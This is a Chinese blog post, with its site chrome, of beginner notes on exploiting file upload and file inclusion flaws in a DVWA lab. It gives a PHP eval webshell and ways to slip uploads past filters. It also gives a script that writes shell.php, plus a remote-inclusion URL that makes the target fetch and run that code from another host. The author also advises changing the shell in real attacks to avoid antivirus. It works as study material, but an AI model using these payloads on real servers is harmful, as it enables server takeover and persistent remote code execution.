<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/blog/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/blog/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/blog/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/blog/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web安全,">










<meta name="description" content="文件上传漏洞由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP/ASP/JSP文件，并能够将这些文件传递给PHP/ASP/JSP解释器，就可以在远程服务器上执行任意脚本。该漏洞利用方法，先上传一句话木马： 1&amp;lt;?php eval($_POST[zzz])?&amp;gt;    //eval()函数允许括号内的字符串作为p">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传与文件包含初学笔记">
<meta property="og:url" content="https://gitee.com/yashengha/blog.git/2019/11/04/文件上传与文件包含初学笔记/index.html">
<meta property="og:site_name" content="天灾级大魔王">
<meta property="og:description" content="文件上传漏洞由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP/ASP/JSP文件，并能够将这些文件传递给PHP/ASP/JSP解释器，就可以在远程服务器上执行任意脚本。该漏洞利用方法，先上传一句话木马： 1&amp;lt;?php eval($_POST[zzz])?&amp;gt;    //eval()函数允许括号内的字符串作为p">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-11-04T07:57:00.394Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件上传与文件包含初学笔记">
<meta name="twitter:description" content="文件上传漏洞由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP/ASP/JSP文件，并能够将这些文件传递给PHP/ASP/JSP解释器，就可以在远程服务器上执行任意脚本。该漏洞利用方法，先上传一句话木马： 1&amp;lt;?php eval($_POST[zzz])?&amp;gt;    //eval()函数允许括号内的字符串作为p">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/blog/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://gitee.com/yashengha/blog.git/2019/11/04/文件上传与文件包含初学笔记/">





  <title>文件上传与文件包含初学笔记 | 天灾级大魔王</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/blog/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">天灾级大魔王</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/blog/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/blog/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://gitee.com/yashengha/blog.git/blog/2019/11/04/文件上传与文件包含初学笔记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="天灾级大魔王">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/blog/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="天灾级大魔王">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">文件上传与文件包含初学笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-04T15:12:05+08:00">
                2019-11-04
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP/ASP/JSP文件，并能够将这些文件传递给PHP/ASP/JSP解释器，就可以在远程服务器上执行任意脚本。<br>该漏洞利用方法，先上传一句话木马：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_POST[zzz])<span class="meta">?&gt;</span>    <span class="comment">//eval()函数允许括号内的字符串作为php代码执行，“zzz”为连接密码（或者理解为参数），此一句话木马常用到一旦出现就会被各种杀毒软件查杀，因此在真正的攻击中建议替换成其他的php函数。</span></span><br></pre></td></tr></table></figure>

<p>然后通过中国菜刀或者蚁剑连接该木马，菜刀连接时使用的是一句话木马文件存储地址，否则可能会弹出http弹窗。<br>文件上传漏洞个人感觉关键在于如何上传一句话木马，以及如何是该木马执行。<br>上传如何绕过网站的安全检测：</p>
<ol>
<li>如果安全等级比较低，通过burp抓包，修改数据包中文件类型，绕过检测</li>
<li>如果安全等级比较高，使用图片木马，将一句话木马与图片结合在一起，绕过检测<br>防御文件上传方法比较简单，允许上传，但此目录下所有文件不给执行权限即可。</li>
</ol>
<h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><p>在通过服务器脚本的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，导致意外的文件泄露甚至恶意的代码注入。<br>常见的可能存在文件包含漏洞的链接：<br><code>?page=文件名</code><br>文件包含利用有两种方法，一种是本地包含，另一种是远程包含。</p>
<p>本地包含利用方法和文件上传类似，上传一句话木马，然后菜刀连接。</p>
<p>远程包含，在文件包含时使用的是远程文件，前提该网站允许调用了其他网站的图片，文件等（在该网站php配置中打开了下面两个参数）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">; Whether to allow the treatment of URLs (like http:// or ftp://) as files.</span><br><span class="line">; http://php.net/allow-url-fopen</span><br><span class="line">allow_url_fopen = On</span><br><span class="line"></span><br><span class="line">; Whether to allow include/require to open URLs (like http:// or ftp://) as files.</span><br><span class="line">; http://php.net/allow-url-include</span><br><span class="line">allow_url_include = On</span><br><span class="line">``` </span><br><span class="line">在我们本地构造一个txt文件，内容为</span><br><span class="line"></span><br><span class="line">``` </span><br><span class="line">&lt;?php</span><br><span class="line">    $f = fopen(&apos;shell.php&apos;,&apos;w&apos;);</span><br><span class="line">    $txt = &apos;&lt;?php eval($_POST[zzz])?&gt;&apos;;</span><br><span class="line">    fwrite($f,$txt);</span><br><span class="line">    fclose($f);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>此文件为php脚本，代码意义，创建一个名为“shell.php”的文件，在其中写入<code>&lt;?php eval($_POST[zzz])?&gt;</code>一句话木马。<br>攻击利用链接如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.213.129/DVWA/DVWA/vulnerabilities/fi/?page=http://192.168.2.33/1234.txt</span><br><span class="line">/////      “http://192.168.213.129/DVWA/DVWA/vulnerabilities/fi/?page=”为我们发现的文件包含漏洞点，后面“http://192.168.2.33/1234.txt”为我们构造的攻击脚本地址</span><br></pre></td></tr></table></figure>

<p>然后菜刀连接马儿的地址即可。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/blog/tags/web安全/" rel="tag"># web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2019/10/29/burp-suite破解详细教程补充/" rel="next" title="burp suite破解需要注意的几点">
                <i class="fa fa-chevron-left"></i> burp suite破解需要注意的几点
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">天灾级大魔王</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/blog/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#文件上传漏洞"><span class="nav-number">1.</span> <span class="nav-text">文件上传漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件包含漏洞"><span class="nav-number">2.</span> <span class="nav-text">文件包含漏洞</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">天灾级大魔王</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  



  
  



  
  





  
  
    <script type="text/javascript" src="/blog/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/canvas-nest/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/three/three-waves.min.js"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/three/canvas_lines.min.js"></script>
  

  
  
    <script type="text/javascript" src="/blog/lib/three/canvas_sphere.min.js"></script>
  


  


  <script type="text/javascript" src="/blog/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/blog/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/blog/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/blog/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/blog/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
